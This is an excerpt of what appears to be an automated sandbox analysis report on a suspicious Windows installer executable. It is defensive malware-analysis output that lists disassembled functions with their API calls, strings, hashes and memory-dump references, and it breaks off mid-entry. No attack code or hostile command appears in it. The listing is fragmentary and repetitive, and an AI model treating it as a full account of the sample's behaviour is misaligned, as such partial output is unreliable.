                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-2951792297
                                        • Opcode ID: cac177dc58e6cdce4745106bcf32f060ca56d97be21c35c0cc42ba282efa81fa
                                        • Instruction ID: 96a923a8ee4f60b6f191beee89bac6a1f57d38d5d4ddb578b75945660f6dc773
                                        • Opcode Fuzzy Hash: cac177dc58e6cdce4745106bcf32f060ca56d97be21c35c0cc42ba282efa81fa
                                        • Instruction Fuzzy Hash: 57110451908B9229FB325A284C40B777F99CF5A760F18047FE5C1722C2C67C5C529B6E
                                        Function 00404053 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404070
                                        • GetSysColor.USER32(00000000), ref: 0040408C
                                        • SetTextColor.GDI32(?,00000000), ref: 00404098
                                        • SetBkMode.GDI32(?,?), ref: 004040A4
                                        • GetSysColor.USER32(?), ref: 004040B7
                                        • SetBkColor.GDI32(?,?), ref: 004040C7
                                        • DeleteObject.GDI32(?), ref: 004040E1
                                        • CreateBrushIndirect.GDI32(?), ref: 004040EB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                        • Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
                                        • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                        • Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65
                                        Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                          • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                        • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                        • String ID:
                                        • API String ID: 3730416702-0
                                        • Opcode ID: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
                                        • Instruction ID: fe65b043c70383bd2b49c92c90746d4950a0c6047a38c1932a2dc3020861886a
                                        • Opcode Fuzzy Hash: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
                                        • Instruction Fuzzy Hash: F6418BB1108711EFF720DFA48884B5BB7F8FF443D1F218929F946D61A9DB34AA448B61
                                        Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                        • GlobalFree.KERNEL32(?), ref: 100024B9
                                        • GlobalFree.KERNEL32(00000000), ref: 100024F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
                                        • Instruction ID: 82133e1bc6da927614d5bcfc3b496831b4cb396c3e6da136b8b2dca3161aa200
                                        • Opcode Fuzzy Hash: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
                                        • Instruction Fuzzy Hash: 75319CB1504251EFF722CF94CCC4C6B7BBDEB852D4B128569FA4193228DB31AC54DB62
                                        Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                        • GlobalFree.KERNEL32(?), ref: 0040272C
                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                        • GlobalFree.KERNEL32(00000000), ref: 00402745
                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                        • String ID:
                                        • API String ID: 3294113728-0
                                        • Opcode ID: 0f129fd7f7df80537c5f9e1eb6f54556ad660c5267986f7df7bd7c5007d73d3e
                                        • Instruction ID: 552098977e22cffcc29eaacdabede243c0f20e1b5d71923adfcfca28e3e686eb
                                        • Opcode Fuzzy Hash: 0f129fd7f7df80537c5f9e1eb6f54556ad660c5267986f7df7bd7c5007d73d3e
                                        • Instruction Fuzzy Hash: 63318DB1C00118BFCF216FA5CD89DAE7E79EF09364F10423AF520762E1C6795D419BA9
                                        Function 00402BDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                        • GetTickCount.KERNEL32 ref: 00402C10
                                        • wsprintfA.USER32 ref: 00402C3E
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                          • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                          • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll), ref: 0040508D
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                          • Part of subcall function 00402BBE: MulDiv.KERNEL32(00000000,00000064,00000257), ref: 00402BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 722711167-2449383134
                                        • Opcode ID: a5c26afaddfd3aecbd3c11435c5afe696aa269bce338e105ebc0525db4289807
                                        • Instruction ID: 53b2eec8c243fd5a5b591a6d8e7090b5e500d3da6e0592f5c5af2241ed808ea0
                                        • Opcode Fuzzy Hash: a5c26afaddfd3aecbd3c11435c5afe696aa269bce338e105ebc0525db4289807
                                        • Instruction Fuzzy Hash: AB0188B0949614ABDB216F64AE4DE9F7B7CFB017057148037FA01B11E1C6B8D541CBAE
                                        Function 004048EA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404905
                                        • GetMessagePos.USER32 ref: 0040490D
                                        • ScreenToClient.USER32(?,?), ref: 00404927
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404939
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040495F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                        • Instruction ID: 7baaa9b85802c8a5173365c44ed2834cc31749f5d024e9fb4d2ec5e64c2f69ce
                                        • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                        • Instruction Fuzzy Hash: E40140B1D00218BADB01DBA4DC85FFFBBBCAB95721F10412BBA10B61D0C7B469018BA5
                                        Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(?), ref: 00401D29
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                        • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                        • CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID: Times New Roman
                                        • API String ID: 3808545654-927190056
                                        • Opcode ID: d8f1134e0d9cc842e71cdb0a798ee728ace2ac96abc312f9551e68033e09961b
                                        • Instruction ID: b452d76144ce78c1ea2c31cbd89393ff29a213aa8dcca448cc35c7c7cb6754f7
                                        • Opcode Fuzzy Hash: d8f1134e0d9cc842e71cdb0a798ee728ace2ac96abc312f9551e68033e09961b
                                        • Instruction Fuzzy Hash: F8011271948340AFE701DBB0AE0EB9A7F74EB19705F108535F141B72E2C6B954159B2F
                                        Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                        • wsprintfA.USER32 ref: 00402B91
                                        • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                        • API String ID: 1451636040-1158693248
                                        • Opcode ID: bccffcf18056edd42c20cb723d80919439a72dcdb3cc8cc3de12e394d3f134cc
                                        • Instruction ID: 4b4d840d1cf11f9656568dd8641bec75cd76f4f3bd4f461a87d93eb2d0bf3f96
                                        • Opcode Fuzzy Hash: bccffcf18056edd42c20cb723d80919439a72dcdb3cc8cc3de12e394d3f134cc
                                        • Instruction Fuzzy Hash: F7F01D70900208BBEF215F61DD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A
                                        Function 004047E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(Angribeligere Setup: Installing,Angribeligere Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                                        • wsprintfA.USER32 ref: 00404886
                                        • SetDlgItemTextA.USER32(?,Angribeligere Setup: Installing), ref: 00404899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$Angribeligere Setup: Installing
                                        • API String ID: 3540041739-3982710442
                                        • Opcode ID: 01753190a1a61c127577f13d1343217740e1c978151e7be2dc7a3714e54fef7e
                                        • Instruction ID: 8631c14a921e8479d2aaee063571767324bc63c1cfe9171b6f21c1c007081b9c
                                        • Opcode Fuzzy Hash: 01753190a1a61c127577f13d1343217740e1c978151e7be2dc7a3714e54fef7e
                                        • Instruction Fuzzy Hash: 90112433A441283BDB0065AD9C49EAF328CDF81334F244637FA25F61D1E9788C1292E8
                                        Function 00403A4C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: TextWindow
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$1033$Angribeligere Setup: Installing$wi
                                        • API String ID: 530164218-3597290920
                                        • Opcode ID: 19cfd19e0caeefaef38e1447d84035fc52b25a49d1c0675f2d636fa1eca01dcb
                                        • Instruction ID: 694a286dd4981efc18ef326c294584d4bec2a1602357d8abc11fec8a6f834ca0
                                        • Opcode Fuzzy Hash: 19cfd19e0caeefaef38e1447d84035fc52b25a49d1c0675f2d636fa1eca01dcb
                                        • Instruction Fuzzy Hash: EC11D4B1B046109BCB24DF15DC809337BBDEB8471A329813BE941A73A1C73D9E029A98
                                        Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 00401CD0
                                        • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                        • DeleteObject.GDI32(00000000), ref: 00401D1B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
                                        • Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
                                        • Opcode Fuzzy Hash: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
                                        • Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79
                                        Function 004057C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 004057CC
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 004057D5
                                        • lstrcatA.KERNEL32(?,00409014), ref: 004057E6
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057C6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-787714339
                                        • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                        • Instruction ID: c144259923a6e848a034fe90771ae4f3275bad2fdba58d127270a3e6eafdfb33
                                        • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                        • Instruction Fuzzy Hash: 00D0A962606A306BD20222168C09E8F6A08CF06300B044033F204B62B2C63C0D418FFE
                                        Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                        • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                          • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                                        Memory Dump Source
